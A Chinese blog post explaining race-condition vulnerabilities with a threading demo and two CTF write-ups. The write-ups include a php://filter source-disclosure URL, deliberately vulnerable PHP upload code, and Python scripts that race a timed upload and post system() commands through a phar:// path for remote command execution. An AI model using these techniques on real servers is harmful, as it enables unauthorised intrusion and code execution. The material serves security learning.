条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。

参考了一些资料,发现一个比较能说明问题的实例。

#-*-coding:utf-8-*-

import threading

COUNT = 0

def Run(threads_name):

    global COUNT

    read_value = COUNT

    print "COUNT in Thread-%s is %d" % (str(threads_name), read_value)

    COUNT = read_value + 1

def main():

    threads = []

    for j in range(10):

        t = threading.Thread(target=Run,args=(j,))

        threads.append(t)

        t.start()

    for i in range(len(threads)):

        threads[i].join()

    print ("Finally, The COUNT is %d" % (COUNT,))

if __name__ == '__main__':

    main()

运行结果:

按照我们的预想,结果应该都是10,但是发现结果可能存在非预期解,并且出现非预期的概率还挺大的。

这是什么原因呢?

原因就在于我们没有对变量COUNT做同步制约,导致可能Thread-7在读COUNT,还没来得及更改COUNT,Thread-8抢夺资源,也来读COUNT,并且将COUNT修改为它读的结果+1,由此出现非预期。

同样的,WEB应用程序因为要为很多用户服务,势必要采用多线程,但是,如果种种原因导致线程间的同步机制没处理好,那么也就会导致非预期和条件竞争的漏洞。

条件竞争在CTF中也有过一些题。

1.moctf

打开网址后一直打开的是index2.php 修改为index.php后发现还是会跳转到index2 抓包修改index.php。

发现index.php是一个302网页,因此就可以看到这里存在的一个文件uploadsomething.php。

随便填写文件名下面写入代码,再进行提交。

访问后

因此这里就需要用到条件竞争,不断的向网站发送请求,然后边发送边访问。

写入一个py文件一直发requests即可

import requests

url="http://119.23.73.3:5006/web2/uploads/b106f91010a3789acab1f27a00d67570052a7921/1.php"

while 1:

    print (requests.get(url).text)

2.XMAN-Easy Gallery

伪协议读取代码

http://202.112.51.184:8004/index.php?page=php://filter/read=convert.base64-encode/resource=upload.php
<html lang="zh-CN">

  <head>

    <meta charset="utf-8">

<?php

$error=$_FILES['pic']['error'];

$tmpName=$_FILES['pic']['tmp_name'];

$name=$_FILES['pic']['name'];

$size=$_FILES['pic']['size'];

$type=$_FILES['pic']['type'];

try{

    if($name!=="")

    {

        $name1=substr($name,-4);

        if(($name1!==".gif") and ($name1!==".jpg"))

        {

            echo "hehe";

            echo "<script language=javascript>alert('不允许的文件类型!');history.go(-1)</script>";

            exit;

        }

        if($type!=="image/jpeg"&&$type!=="image/gif")

        {

            echo mime_content_type($tmpName);

            echo "<script language=javascript>alert('不允许的文件类型!');history.go(-1)</script>";

            exit;

        }

        if(is_uploaded_file($tmpName)){

            $time=time();

            $rootpath='uploads/'.$time.$name1;

            if(!move_uploaded_file($tmpName,$rootpath)){

                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";

                exit;

            }

            else{

                sleep(5);

                if ($type=='image/jpeg')

                {

                    $im = @imagecreatefromjpeg($rootpath);

                    if(!$im){

                      $im = imagecreatetruecolor(150, 30);

                      $bg = imagecolorallocate($im, 255, 255, 255);

                      $text_color = imagecolorallocate($im, 0, 0, 255);

                      imagefilledrectangle($im, 0, 0, 150, 30, $bg);

                      imagestring($im, 3, 5, 5, "Error loading image", $text_color);

                    } else {

                        $time=time();

                        $new_rootpath='uploads/'.$time.$name1;

                        imagejpeg($im,$new_rootpath);

                    }

                }

                else if ($type=='image/gif')

                {

                    $im = @imagecreatefromgif($rootpath);

                    if(!$im){

                      $im = imagecreatetruecolor(150, 30);

                      $bg = imagecolorallocate($im, 255, 255, 255);

                      $text_color = imagecolorallocate($im, 0, 0, 255);

                      imagefilledrectangle($im, 0, 0, 150, 30, $bg);

                      imagestring($im, 3, 5, 5, "Error loading image", $text_color);

                    } else {

                        $time=time();

                        $new_rootpath='uploads/'.$time.$name1;

                        imagegif($im,$new_rootpath);

                    }

                }

                unlink($rootpath);

            }

        }

        echo "图片ID:".$time;

    }

}

catch(Exception $e)

{

    echo "ERROR";

}

//

 ?>

 </html>

首先是验证上传的文件是否为图片格式,如果上传了正确的图片,imagecreatefromjpeg()返回图像资源,文件名更换为新的时间戳,用新的文件路径$new_rootpath输出图片,最后删除原文件unlink($rootpath);如果上传了不正确的图片,不会更换新的文件路径,最后还要删除源文件unlink($rootpath);上传过程中存在一个延时函数sleep(5),所以上传的文件即使验证不成功也有5秒钟的时间存在。

解法:

随后用Python访问链接

import requests

import time

id = int(time.time())

s=requests.session()

data0={'v':"phpinfo();",}

data1={

    'v':"system('ls');"

}

data2={

    'v':"system('cat xxxxxxxxxasdasf_flag.php');"

}

while 1:

    for i in range(id-50,id+50):

        url = 'http://202.112.51.184:9005/index.php?page=phar://./uploads/' + str(i) + '.jpg/v'

        t=s.post(url,data=data1).content

        print i

        if 'flag' in t:

            print t

            break
 

条件竞争(race condition)的更多相关文章

  1. 竞态条件 race condition data race

    竞态条件 race condition Race condition - Wikipedia https://en.wikipedia.org/wiki/Race_condition A race c ...

  2. Fortify Audit Workbench 笔记 Race Condition: Singleton Member Field 竞争条件:单例的成员字段

    Race Condition: Singleton Member Field 竞争条件:单例的成员字段 Abstract Servlet 成员字段可能允许一个用户查看其他用户的数据. Explanat ...

  3. 理解竞争条件( Race condition)漏洞

    这几天一个叫做"Dirty COW"的linux内核竞争条件漏洞蛮火的,相关公司不但给这个漏洞起了个洋气的名字,还给它设计了logo(见下图),首页,Twitter账号以及网店.恰 ...

  4. Operating System-进程/线程内部通信-竞争条件(Race Conditions)

    从本文开始介绍进程间的通信,进程间通信遇到的问题以及方式其实和线程之间通信是一致的,所以进程间通信的所有理论知识都可以用在线程上,接下来的系列文章都会以进程之间的通信为模版进行介绍,本文主要内容: 进 ...

  5. Race condition

    在很多门课上都接触到race condition, 其中也举了很多方法解决这个问题.于是想来总结一下这些方法. Race condition 它旨在描述一个系统或者进程的输出依赖于不受控制的事件出现顺 ...

  6. 【多线程同步案例】Race Condition引起的性能问题

    Race Condition(也叫做资源竞争),是多线程编程中比较头疼的问题.特别是Java多线程模型当中,经常会因为多个线程同时访问相同的共享数据,而造成数据的不一致性.为了解决这个问题,通常来说需 ...

  7. MySQL/MariaDB/PerconaDB-提权条件竞争漏洞

    背景 2016年11月01日,国外安全研究员Dawid Golunski在 MySQl, MariaDB 和 PerconaDB 数据库中发现条件竞争漏洞,该漏洞允许本地用户使用低权限(CREATE/ ...

  8. 第8章 用户模式下的线程同步(4)_条件变量(Condition Variable)

    8.6 条件变量(Condition Variables)——可利用临界区或SRWLock锁来实现 8.6.1 条件变量的使用 (1)条件变量机制就是为了简化 “生产者-消费者”问题而设计的一种线程同 ...

  9. c++并发编程之条件变量(Condition Variable)

    条件变量(Condition Variable)的一般用法是:线程 A 等待某个条件并挂起,直到线程 B 设置了这个条件,并通知条件变量,然后线程 A 被唤醒.经典的「生产者-消费者」问题就可以用条件 ...

随机推荐

  1. c++日志工具spdLog

    c++日志工具spdLog简单使用示例代码 spdlog直接引用头文件就可以使用,这一点还是比较方便的,也是刚入门使用,下面是在源码的示例代码基础上修改测试的代码: #include <cstd ...

  2. Hello GCN

    参考链接: https://www.zhihu.com/question/54504471/answer/611222866 1 拉普拉斯矩阵 参考链接: http://bbs.cvmart.net/ ...

  3. Linux系统安装MySQL详细教程

    首先进入MySQL官网下载rpm安装包 用yum install mysql80-community-release-el7-3.noarch.rpm 安装 yum repolist all|grep ...

  4. The Involution Principle

    目录 Catalan Paths Vandermonde Determinant The Pfaffian Catalan Paths 从 \((0,0)\) 走到 \((n,n)\), 每次只能向上 ...

  5. [leetcode/lintcode 题解] 有效回文 II · Valid Palindrome II

    [题目描述] 给一个非空字符串 s,你最多可以删除一个字符.判断是否可以把它变成回文串. 在线评测地址: https://www.lintcode.com/problem/valid-palindro ...

  6. 2020-05-18:MYSQL为什么用B+树做索引结构?平时过程中怎么加的索引?

    福哥答案2020-05-18:此答案来自群员:因为4.0成型那个年代,B树体系大量用于文件存储系统,甚至当年的Longhorn的winFS都是基于b树做索引,开源而且好用的也就这么个体系了.B+树的磁 ...

  7. C#LeetCode刷题之#342-4的幂(Power of Four)

    问题 该文章的最新版本已迁移至个人博客[比特飞],单击链接 https://www.byteflying.com/archives/4058 访问. 给定一个整数 (32 位有符号整数),请编写一个函 ...

  8. python处理转载博客html

    前景 在转载别人博客的时候通常我们会通过复制html然后放到编辑器里面, 但是通常html里有很多杂七杂八的东西, 比如script, svg这些标签导致排版出现问题 例如由lu标签引起的 由svg标 ...

  9. 我的第一个程序Hello world

    //include:导入一个文件:stdio:标准输入输出库(std是一个标准库:i:input:o:output:):.h:头文件:<>:表示导入系统文件:“”表示导入系统文件 #inc ...

  10. md文件批量转化为html

    任务描述 博客的源文件一般以md文件保存 读取md源文件解析为html代码,然后嵌入到body中去 公式部分,需要使用第三方js库加载 实现办法 基于Django实现,进入webpage页面,然后通过 ...